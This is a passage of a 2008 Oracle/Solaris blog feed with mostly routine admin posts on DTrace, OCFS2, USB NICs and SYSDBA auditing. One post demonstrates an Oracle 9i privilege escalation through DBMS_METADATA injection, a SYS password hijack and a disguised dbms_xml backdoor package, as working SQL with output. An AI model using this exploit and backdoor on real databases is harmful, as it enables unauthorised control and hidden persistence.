&lt;span style='font-weight: bold;'&gt;Results &amp;amp; Conclusion&lt;/span&gt;
&lt;p&gt;The measurements from Swingbench which we will use for comparing the performance of a UFS file system when Oracle uses direct I/O versus buffered I/O are the following: &lt;ul&gt;
	&lt;li&gt;Transaction throughput (number of transactions per minute)&lt;/li&gt;
	&lt;li&gt;Average response time for each transaction type&lt;/li&gt;
&lt;/ul&gt; We will perform a run of the benchmark 5 times for each configuration we want to compare and then present the average of the measurements below. So we will run the tests 5 times with buffered I/O and then 5 times with un-buffered I/O by setting the &lt;code&gt;FILESYSTEMIO_OPTIONS&lt;/code&gt; parameter.&lt;/p&gt;

&lt;p&gt;So the comparisons from these 2 measurements are as follows:&lt;/p&gt;
&lt;a href='http://4.bp.blogspot.com/_heUWGgTt1gk/STIMDvZVpMI/AAAAAAAAA5U/UNq_9k2HGN4/s1600-h/tab2.JPG' onblur='try {parent.deselectBloggerImageGracefully();} catch(e) {}'&gt;&lt;img src='http://4.bp.blogspot.com/_heUWGgTt1gk/STIMDvZVpMI/AAAAAAAAA5U/UNq_9k2HGN4/s320/tab2.JPG' id='BLOGGER_PHOTO_ID_5274291372006155458' border='0' alt='' style='margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 55px;' /&gt;&lt;/a&gt;
&lt;p&gt;While these tests were not very conclusive or thorough, they do show how Swingbench can be used for generating database activity. The measurements which I compared are only some of the measurements which Swingbench reports when finished running a benchmark. Hopefully I will be able to play and post a bit more on the excellent Swingbench utility in the future.&lt;/p&gt;</content>
 </entry>
 
 <entry>
   <title>OCFS2 Mount by Label Support</title>
   <link href="http://posulliv.github.com/2008/11/25/ocfs2-mount-by-label-support"/>
   <updated>2008-11-25T00:00:00-08:00</updated>
   <id>http://posulliv.github.com/2008/11/25/ocfs2-mount-by-label-support</id>
   <content type="html">&lt;p&gt;While messing around with OCFS2 on my RHEL4 install, I discovered that if I created an OCFS2 filesystem with a label, I was unable to mount it by that label. I would encounter the following:&lt;/p&gt;
&lt;span style='font-family: courier new;'&gt;# mount -L &quot;oradata&quot; /ocfs2&lt;/span&gt;&lt;strong style='font-family: courier new;'&gt;mount: no such partition found
&lt;/strong&gt;
&lt;p&gt;I found this quite strange and did some investigation. The version of util-linux that was present on my system after a fresh RHEL 4 install was &lt;em&gt;-&lt;/em&gt;&lt;em&gt; util-linux-2.12a-16.EL4.6.&lt;/em&gt;&lt;/p&gt;
&lt;em /&gt;
&lt;p&gt;So I grabbed the latest version of util-linux from Red Hat and viola, I am now able to mount an OCFS2 filesystem by its label.&lt;/p&gt;

&lt;p&gt;The current version of util-linux on my system is - &lt;em&gt; util-linux-2.12a-16.EL4.20.&lt;/em&gt;&lt;/p&gt;</content>
 </entry>
 
 <entry>
   <title>Observing Oracle I/O Access Patterns with DTrace</title>
   <link href="http://posulliv.github.com/2008/11/25/observing-oracle-io-access-patterns-with-dtrace"/>
   <updated>2008-11-25T00:00:00-08:00</updated>
   <id>http://posulliv.github.com/2008/11/25/observing-oracle-io-access-patterns-with-dtrace</id>
   <content type="html">In this post, I will use the &lt;code&gt;seeks.d&lt;/code&gt; and &lt;code&gt;iopattern&lt;/code&gt; DTrace scripts, which are available as part of the &lt;a href=&quot;http://www.opensolaris.org/os/community/dtrace/dtracetoolkit/&quot;&gt;DTraceToolKit&lt;/a&gt; (This toolkit is an extremely useful collection of scripts created by &lt;a href=&quot;http://www.brendangregg.com/&quot;&gt;Brendan Gregg&lt;/a&gt;), to view the I/O access patterns typical of Oracle. DTrace is able to capture data throughout the kernel and so the job of finding access patterns has been greatly simplified.&lt;br&gt;

The system on which these examples are being run has redo logs on one disk, datafiles on another disk and the control file is on another disk.&lt;br&gt;

To get system-wide access patterns, the &lt;code&gt;iopattern&lt;/code&gt; script can be used. Sample output is as follows:

&lt;pre&gt;
# ./iopattern
%RAN %SEQ  COUNT    MIN    MAX    AVG     KR     KW
100    0      7   4096   8192   7606      4     48
0    0      0      0      0      0      0      0
0    0      0      0      0      0      0      0
100    0      6   8192   8192   8192      0     48
0    0      0      0      0      0      0      0
0    0      0      0      0      0      0      0
100    0      6   8192   8192   8192      0     48
0    0      0      0      0      0      0      0
0    0      0      0      0      0      0      0
100    0      6   8192   8192   8192      0     48
0    0      0      0      0      0      0      0
&lt;/pre&gt;

This output was generated on an idle system (0.04 load). You can see that the &lt;code&gt;iopattern&lt;/code&gt; script provides the percentage of random and sequential I/O on the system. During this monitoring period while the system was idle, all the I/O was random. The iopattern script also provides the number and total size of the I/O operations performed during the sample period, and it provides the minimum, maximum, and average I/O sizes.&lt;br&gt;

Now, look at the output generated from the &lt;code&gt;iopattern&lt;/code&gt; script during a period of heavy database load:

&lt;pre&gt;
# ./iopattern
%RAN %SEQ  COUNT    MIN    MAX    AVG     KR     KW
92    8     69   4096   8192   6589    304    140
86   14     69   4096   8192   5995    228    176
82   18     67   4096   8192   5257     64    280
84   16     19   4096   8192   6036     40     72
77   23     22   4096   8192   4282      0     92
88   12     68   4096 1015808  21744   1120    324
97    3     67   4096   8192   7274    400     76
89   11     66   4096   8192   6392    276    136
90   10     71   4096   8192   6345    216    224
87   13     62   4096   8192   5879    184    172
90   10     10   4096   8192   6553     40     24
100    0     17   8192   8192   8192     88     48
87   13     33   4096 1048576  38353   1168     68
86   14     65   4096   8192   6049    236    148
&lt;/pre&gt;

As you can see from the above output, the majority of the I/O which occurs during this period is random. In my mind, this one indication that the type of I/O typical in an OLTP environment is random (as we would expect).&lt;br&gt;

To get the I/O distribution for each disk, the &lt;code&gt;seeks.d&lt;/code&gt; script can be used. This script measures the seek distance for disk events and generates a distribution plot. This script is based on the &lt;code&gt;seeksize.d&lt;/code&gt; script provided with the DTraceToolKit and is available in the &lt;a href=&quot;http://www.solarisinternals.com/&quot;&gt;Solaris Internals&lt;/a&gt; volumes.&lt;br&gt;

Sample output from the &lt;code&gt;seeks.d&lt;/code&gt; script is show below:

&lt;pre&gt;
# ./seeks.dTracing... Hit Ctrl-C to end.^C
Tracing... Hit Ctrl-C to end.
^C

cmdk0
        value  ------------- Distribution ------------- count
           -1 |                                         0
            0 |@@@@@@@@@@@@@@@@@@@@@                    43
            1 |                                         0
            2 |                                         0
            4 |                                         0
            8 |                                         0
           16 |                                         0
           32 |                                         0
           64 |                                         0
          128 |@@@@@@@@@@@@@                            26
          256 |@@@@@@                                   12
          512 |                                         0

sd1
        value  ------------- Distribution ------------- count
        32768 |                                         0
        65536 |@@@@@@@@@@@@@@@@@@@@                     1
       131072 |                                         0
       262144 |                                         0
       524288 |                                         0
      1048576 |@@@@@@@@@@@@@@@@@@@@                     1
      2097152 |                                         0
&lt;/pre&gt;

This output was generated when the system was idle as before. This output summarizes the seeks performed by each disk on the system. The &lt;code&gt;sd1&lt;/code&gt; disk in the output above is the disk on which my Oracle datafiles reside. The value column in the output indicates the size of the seek that was performed in bytes. This indicates some random I/O on this disk since the length of the seeks are quite large. The disk on which the redo logs are located does not show up in the output above since no I/O is being generated on that disk (&lt;code&gt;sd2&lt;/code&gt;).

Now, it is interesting to look at the output generated from the &lt;code&gt;seeks.d&lt;/code&gt; script during a period when the database is under a heavy load.

&lt;pre&gt;
# ./seeks.d
Tracing... Hit Ctrl-C to end.
^C

cmdk0
        value  ------------- Distribution ------------- count
           -1 |                                         0
            0 |@@@@@@@@@@@@@@@@@@@@@@@                  18
            1 |                                         0
            2 |                                         0
            4 |                                         0
            8 |                                         0
           16 |                                         0
           32 |                                         0
           64 |                                         0
          128 |@@@@@@@@@@@@@                            10
          256 |@@@@@                                    4
          512 |                                         0

sd2
        value  ------------- Distribution ------------- count
           -1 |                                         0
            0 |@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@           430
            1 |                                         0
            2 |                                         0
            4 |                                         0
            8 |@@@@@@@@                                 120
           16 |@                                        11
           32 |                                         3
           64 |                                         0
          128 |                                         0
          256 |                                         0
          512 |                                         0
         1024 |                                         0
         2048 |                                         0
         4096 |                                         0
         8192 |                                         0
        16384 |                                         0
        32768 |                                         0
        65536 |                                         6
       131072 |                                         0

sd1
        value  ------------- Distribution ------------- count
          512 |                                         0
         1024 |@@@                                      31
         2048 |                                         5
         4096 |                                         0
         8192 |                                         0
        16384 |                                         0
        32768 |                                         0
        65536 |@@                                       23
       131072 |@@@@@@@@                                 92
       262144 |@@@@@@@                                  73
       524288 |@                                        6
      1048576 |                                         4
      2097152 |@                                        14
      4194304 |@@@                                      29
      8388608 |@@@@                                     40
     16777216 |@@@@@                                    56
     33554432 |@@@@@@                                   65
     67108864 |                                         0
&lt;/pre&gt;

This time the disk on which the redo logs are located shows up as there is activity occurring on it. You can see that most of this activity is sequential as most of the events incurred a zero length seek. This makes sense as the log writer background process (LGWR) writes the redo log files in a sequential manner. However, you can see that I/O on the disk which contains the Oracle datafiles is random as seen by the distributed seek lengths (up to the 33554432 to 67108864 bucket).&lt;br&gt;

The above post did not really contain any new information but I thought it would be cool to show a tiny bit of the possibility that DTrace has. This is one of the coolest tools I have used in the last year and is one of the many reasons why I have become a huge Solaris fan!
</content>
 </entry>
 
 <entry>
   <title>Installing &amp; Configuring a USB NIC on Solaris</title>
   <link href="http://posulliv.github.com/2008/11/25/installing-configuring-a-usb-nic-on-solaris"/>
   <updated>2008-11-25T00:00:00-08:00</updated>
   <id>http://posulliv.github.com/2008/11/25/installing-configuring-a-usb-nic-on-solaris</id>
   <content type="html">&lt;p&gt;In this post, I will provide a very quick overview of how to install and configure a USB network interface on Solaris.&lt;/p&gt;
&lt;span style='font-size:130%;'&gt;&lt;span style='font-weight: bold;'&gt;Obtaining the USB Driver&lt;/span&gt;&lt;/span&gt;
&lt;p&gt;The driver for a generic USB network interface which should cover the majority of USB NIC devices can be downloaded from &lt;a href='http://homepage2.nifty.com/mrym3/taiyodo/upf-0.8.0.tar.gz'&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;span style='font-size:130%;'&gt;&lt;span style='font-weight: bold;'&gt;Installing the USB Driver&lt;/span&gt;&lt;/span&gt;
&lt;p&gt;After downloading the driver, uncompress the gunzipped file and extract the archive as the root user.&lt;/p&gt;
&lt;span style='font-size:85%;'&gt;&lt;span style='font-family: courier new;'&gt;# gunzip upf-0.8.0.tar.gz ; tar xvf upf-0.8.0.tar&lt;/span&gt;&lt;/span&gt;
&lt;p&gt;This will create a &lt;span style='font-size:85%;'&gt;&lt;span style='font-family: courier new;'&gt;upf-0.8.0&lt;/span&gt;&lt;/span&gt; directory in the current directory. Change to the &lt;span style='font-size:85%;'&gt;&lt;span style='font-family: courier new;'&gt;upf-0.8.0&lt;/span&gt;&lt;/span&gt; directory. Now we need to perform the following to install the driver:&lt;/p&gt;
&lt;span style='font-size: 85%; font-family: courier new;'&gt;# make install
# ./adddrv.sh&lt;/span&gt;
&lt;p&gt;After this has been completed, the driver has been installed but the system needs to be rebooted before we can use the new driver. Reboot the system using the following procedure:&lt;/p&gt;
&lt;span style='font-size:85%;'&gt;&lt;span style='font-family: courier new;'&gt;# touch /reconfigure&lt;/span&gt;
&lt;span style='font-family: courier new;'&gt; # shutdown -i 0 -g0 y&lt;/span&gt;&lt;/span&gt;
&lt;p&gt;This will scan for new hardware on reboot. The new NIC device will show up as &lt;span style='font-size:85%;'&gt;&lt;span style='font-family: courier new;'&gt;/dev/upf0&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;span style='font-size:130%;'&gt;&lt;span style='font-weight: bold;'&gt;Configuring the NIC Device&lt;/span&gt;&lt;/span&gt;
&lt;p&gt;Once the USB driver has been installed and the system has been rebooted correctly, the NIC device can be configured as follows. (In this example, we will just make up an IP address to use).&lt;/p&gt;
&lt;span style='font-size:85%;'&gt;&lt;span style='font-family: courier new;'&gt;# ifconfig upf0 plumb&lt;/span&gt;
&lt;span style='font-family: courier new;'&gt; # ifconfig upf0 192.168.2.111 netmask 255.255.255.0 up&lt;/span&gt;&lt;/span&gt;&lt;span style='font-size:130%;'&gt;&lt;span style='font-weight: bold;'&gt;Making Sure the NIC Device Starts on Boot&lt;/span&gt;&lt;/span&gt;
&lt;p&gt;To ensure that the new NIC device starts automatically on boot, we need to create a &lt;span style='font-size:85%;'&gt;&lt;span style='font-family: courier new;'&gt;/etc/hostname&lt;/span&gt;&lt;/span&gt; file for that interface containing either the IP address configured for that interface of if we placed the IP address in the &lt;span style='font-size:85%;'&gt;&lt;span style='font-family: courier new;'&gt;/etc/inet/hosts&lt;/span&gt;&lt;/span&gt; file, then the hostname for that interface.&lt;/p&gt;</content>
 </entry>
 
 <entry>
   <title>Installing a Back Door in Oracle 9i</title>
   <link href="http://posulliv.github.com/2008/11/25/installing-a-back-door-in-oracle-9i"/>
   <updated>2008-11-25T00:00:00-08:00</updated>
   <id>http://posulliv.github.com/2008/11/25/installing-a-back-door-in-oracle-9i</id>
   <content type="html">In this post, we will demonstrate a way an attacker could install a back door in a 9i Oracle database. The information on this post is based on information obtained from &lt;a href=&quot;http://www.petefinnigan.com/&quot;&gt;Pete Finnigin's website&lt;/a&gt; and the &lt;a href=&quot;http://www.2600.com/&quot;&gt;2600 magazine&lt;/a&gt;. The version of the database we are using in this post is:

&lt;pre&gt;
sys@ORA9R2&gt; select * from v$version;
BANNER
----------------------------------------------------------------
Oracle9i Enterprise Edition Release 9.2.0.4.0
PL/SQL Release 9.2.0.4.0 - Production
CORE 9.2.0.3.0 Production
TNS for Linux: Version 9.2.0.4.0 - Production
NLSRTL Version 9.2.0.4.0 - Production
&lt;/pre&gt;

&lt;h2&gt;Creating the User&lt;/h2&gt;
In this example, we will create a user that we will install the back door with. We will presume that either an attacker has already gained access to this account or that a legitimate user wishes to install a back door in our database (the so called inside threat). The user we will install the back door as is testUser. &lt;span style=&quot;font-family: georgia;&quot;&gt;We will only grant &lt;code&gt;CONNECT&lt;/code&gt; and &lt;code&gt;RESOURCE&lt;/code&gt; to this user.

&lt;pre&gt;
sys@ORA9R2&gt; create user testUser identified by testUser;

User created.

sys@ORA9R2&gt; grant connect, resource to testUser;

Grant succeeded.

sys@ORA9R2&gt; connect testUser/testUser
Connected.
testuser@ORA9R2&gt; select * from user_role_privs;

USERNAME GRANTED_ROLE ADM DEF OS_
-------- ------------ --- --- ---
TESTUSER CONNECT      NO  YES NO
TESTUSER RESOURCE     NO  YES NO

testuser@ORA9R2&gt;
&lt;/pre&gt;

&lt;h2&gt;Gaining DBA Privileges&lt;/h2&gt;

Now we will use a known exploit in the 9i version of Oracle that will allow this user to obtain the DBA role. This exploit is described in the document 'Many Ways to Become DBA' by &lt;a href=&quot;http://www.petefinnigan.com/&quot;&gt;Pete Finnigan&lt;/a&gt;. This exploit invloves creating a function and then exploiting a known vulnerability in the DBMS_METADATA package.

&lt;pre&gt;
testuser@ORA9R2&gt; create or replace function testuser.hack return varchar2
2 authid current_user is
3 pragma autonomous_transaction;
4 begin
5 execute immediate 'grant dba to testUser';
6 return '';
7 end;
8 /

Function created.

testuser@ORA9R2&gt; select sys.dbms_metadata.get_ddl('''||testuser.hack()||''','')
2 from dual;
ERROR:
ORA-31600: invalid input value '||testuser.hack()||' for parameter OBJECT_TYPE in
function GET_DDL
ORA-06512: at &quot;SYS.DBMS_SYS_ERROR&quot;, line 105
ORA-06512: at &quot;SYS.DBMS_METADATA_INT&quot;, line 1536
ORA-06512: at &quot;SYS.DBMS_METADATA_INT&quot;, line 1900
ORA-06512: at &quot;SYS.DBMS_METADATA_INT&quot;, line 3606
ORA-06512: at &quot;SYS.DBMS_METADATA&quot;, line 504
ORA-06512: at &quot;SYS.DBMS_METADATA&quot;, line 560
ORA-06512: at &quot;SYS.DBMS_METADATA&quot;, line 1221
ORA-06512: at line 1

no rows selected

testuser@ORA9R2&gt; select * from user_role_privs;

USERNAME GRANTED_ROLE ADM DEF OS_
-------- ------------ --- --- ---
TESTUSER CONNECT      NO  YES NO
TESTUSER DBA          NO  YES NO
TESTUSER RESOURCE     NO  YES NO

testuser@ORA9R2&gt;
&lt;/pre&gt;

As you can see from the output above, the attacker has now gained the DBA role. Now, the attacker can start working on installing the back door.

&lt;h2&gt;Creating and Installing the Back Door&lt;/h2&gt;
Now, he/she can save what the encrypted form of the SYS user's password is before installing the back door.

&lt;pre&gt;
testuser@ORA9R2&gt; select username, password
2 from dba_users
3 where username = 'SYS' ;

USERNAME PASSWORD
-------- ------------------------------
SYS      43CA255A7916ECFE

testuser@ORA9R2&gt;
&lt;/pre&gt;

Now, the attacker wants to install the back door as the SYS user so he/she alters the password of the SYS user so they can connect as the SYS user. The attacker will then change this password back to the saved password once finished installing the back door.&lt;br&gt;

&lt;pre&gt;
testuser@ORA9R2&gt; alter user sys identified by pass;
User altered.
testuser@ORA9R2&gt; connect sys/pass as sysdba
Connected.
testuser@ORA9R&gt;
&lt;/pre&gt;

Now the attacker is connected as the SYS user and starts on creating the back door. The attacker creates the back door like so:

&lt;pre&gt;
testuser@ORA9R2&gt; CREATE OR REPLACE PACKAGE dbms_xml AS
2 PROCEDURE parse (string IN VARCHAR2);
3 END dbms_xml;
4 /
Package created.
testuser@ORA9R2&gt;
CREATE OR REPLACE PACKAGE BODY dbms_xml AS
PROCEDURE parse (string IN VARCHAR2) IS
var1 VARCHAR2 (100);
BEGIN
IF string = 'unlock' THEN
SELECT PASSWORD INTO var1 FROM dba_users WHERE username = 'SYS';
EXECUTE IMMEDIATE 'create table syspa1 (col1 varchar2(100))';
EXECUTE IMMEDIATE 'insert into syspa1 values ('''||var1||''')';
COMMIT;
EXECUTE IMMEDIATE 'ALTER USER SYS IDENTIFIED BY padraig';
END IF;
IF string = 'lock' THEN
EXECUTE IMMEDIATE 'SELECT col1 FROM syspa1 WHERE ROWNUM=1' INTO var1;
EXECUTE IMMEDIATE 'ALTER USER SYS IDENTIFIED BY VALUES '''||var1||'''';
EXECUTE IMMEDIATE 'DROP TABLE syspa1';
END IF;
IF string = 'make' THEN
EXECUTE IMMEDIATE 'CREATE USER hill IDENTIFIED BY padraig';
EXECUTE IMMEDIATE 'GRANT DBA TO hill';
END IF;
IF string = 'unmake' THEN
EXECUTE IMMEDIATE 'DROP USER hill CASCADE';
END IF;
END;
END dbms_xml;
/

testuser@ORA9R2&gt; CREATE PUBLIC SYNONYM dbms_xml FOR dbms_xml;

Synonym created.

testuser@ORA9R2&gt; GRANT EXECUTE ON dbms_xml TO PUBLIC;

Grant succeeded.

testuser@ORA9R2&gt;
&lt;/pre&gt;

This package does the following (examples will be shown below):
&lt;ul&gt;
	&lt;li&gt;It can unlock the SYS account by changing the password to a known password (in this case 'padraig').&lt;/li&gt;
	&lt;li&gt;Then, it can revert the SYS account's password back to the original password.&lt;/li&gt;
	&lt;li&gt;It can create a new user account with a known password that has the DBA role which can later be dropped from the database.&lt;/li&gt;
&lt;/ul&gt;

The attacker has now created a back door that can be very difficult to discover. The attacker has chosen a name for the package that looks like it was installed with the Oracle database. Now, the attacker changes the SYS user's password back to its original value to prevent the DBA from noticing that the SYS account has been hijacked. The attacker will also revoke the DBA role from his/her user account to prevent detection. This role is no longer need by the attacker since he/her has installed the back door.&lt;br&gt;

&lt;pre&gt;
testuser@ORA9R2&gt; alter user sys identified by values '43CA255A7916ECFE';

User altered.

testuser@ORA9R2&gt; revoke dba from testUser;

Revoke succeeded.

testuser@ORA9R2&gt; disconnect
Disconnected from Oracle9i Enterprise Edition Release 9.2.0.4.0 - Production
With the Partitioning, OLAP and Oracle Data Mining options
JServer Release 9.2.0.4.0 - Production
testuser@ORA9R2&gt; connect testUser/testUser
Connected.
testuser@ORA9R2&gt; select * from user_role_privs;

USERNAME GRANTED_ROLE ADM DEF OS
-------- ------------ --- --- ---
TESTUSER CONNECT      NO YES NO
TESTUSER RESOURCE     NO YES NO
&lt;/pre&gt;

In this first example, the attacker is going to use his/her back door to unlock the SYS account and connect as the SYS user.

&lt;pre&gt;
testuser@ORA9R2&gt; execute dbms_xml.parse('unlock');

PL/SQL procedure successfully completed.

testuser@ORA9R2&gt; connect sys/padraig as sysdba
Connected.
testuser@ORA9R2&gt; show user
USER is &quot;SYS&quot;
testuser@ORA9R2&gt;
&lt;/pre&gt;

Now, the attacker is finished doing his/her work as the SYS user and will change the SYS password back to the original password by calling the back door again:
&lt;pre&gt;
testuser@ORA9R2&gt; execute dbms_xml.parse('lock');

PL/SQL procedure successfully completed.

testuser@ORA9R2&gt;
&lt;/pre&gt;

&lt;h2&gt;Conclusion&lt;/h2&gt;

This post showed how an attacker could exploit a known vulnerability in Oracle 9i to obtain DBA privileges and install a back door in an Oracle database. Of course, a wary DBA could detect this by auditing the &lt;code&gt;ALTER USER&lt;/code&gt; statement and checking &lt;code&gt;SYS&lt;/code&gt; owned objects periodically.
</content>
 </entry>
 
 <entry>
   <title>Generating a System State Dump on HP-UX with gdb</title>
   <link href="http://posulliv.github.com/2008/11/25/generating-a-system-state-dump-on-hp-ux-with-gdb"/>
   <updated>2008-11-25T00:00:00-08:00</updated>
   <id>http://posulliv.github.com/2008/11/25/generating-a-system-state-dump-on-hp-ux-with-gdb</id>
   <content type="html">I have previously used the gdb (GNU Debugger) to generate oracle system state dumps on Linux systems by attaching to an Oracle process. The ability to do this has been well documented by Oracle on &lt;a href=&quot;http://metalink.oracle.com/&quot;&gt;Metalink&lt;/a&gt; (Note 121779.1) and in &lt;a href=&quot;http://el-caro.blogspot.com/search/label/systemstate%20dump&quot;&gt;other locations&lt;/a&gt;.&lt;br&gt;

The problem with this is that it does not work on the HP-UX platform. I found this out at the wrong time when trying to generate a system state dump during a database hang!&lt;br&gt;

Apparently, the Oracle executable needs to be re-linked on the HP-UX platform to enable the gdb debugger to generate system state dumps by attaching to an Oracle process.&lt;br&gt;

You can see all the gory details in Metalink Note 273324.1. I posted it here as I thought it might prove useful for me to have this information somewhere should I forget it in the future...
</content>
 </entry>
 
 <entry>
   <title>Audting SYSDBA Users</title>
   <link href="http://posulliv.github.com/2008/11/25/audting-sysdba-users"/>
   <updated>2008-11-25T00:00:00-08:00</updated>
   <id>http://posulliv.github.com/2008/11/25/audting-sysdba-users</id>
   <content type="html">I recently came accross this feature in Oracle introduced in 9i where all operations performed by a user connecting as SYSDBA are logged to an OS file. I'm sure most DBA's are familiar with this feature already but I have only just been enlightened!&lt;br&gt;

To enable this feature auditing must be enabled and the &lt;code&gt;AUDIT_SYS_OPERATIONS&lt;/code&gt; parameter must be set to &lt;code&gt;TRUE&lt;/code&gt;. For example:

&lt;pre&gt;
sys@ORCLINS1&gt; ALTER SYSTEM SET AUDIT_SYS_OPERATIONS = TRUE SCOPE=SPFILE;
&lt;/pre&gt;

FALSE is the default value for this parameter. Pretty obvious from the above statement but the database must be restarted for the parameter to take affect.&lt;br&gt;

All the audit records are then written to an operating system. The location of this file is determined by the &lt;code&gt;AUDIT_FILE_DEST&lt;/code&gt; parameter.

&lt;pre&gt;
sys@ORCLINS1&gt; show parameter AUDIT_FILE_DEST
NAME TYPE VALUE
&gt;--------------  ------------------------------------------
audit_file_dest string /oracle/oracle/admin/orclpad/adump

sys@ORCLINS1&gt;
&lt;/pre&gt;

An audit file will be created for each session started by a user logging in as SYSDBA. The audit file will contain the process ID of the server session that Oracle started for the user in its file name.&lt;br&gt;

Most people are probably already familiar with this handy feature but I like to have it documented for myself somewhere so I put it here!
</content>
 </entry>
 
 
</feed>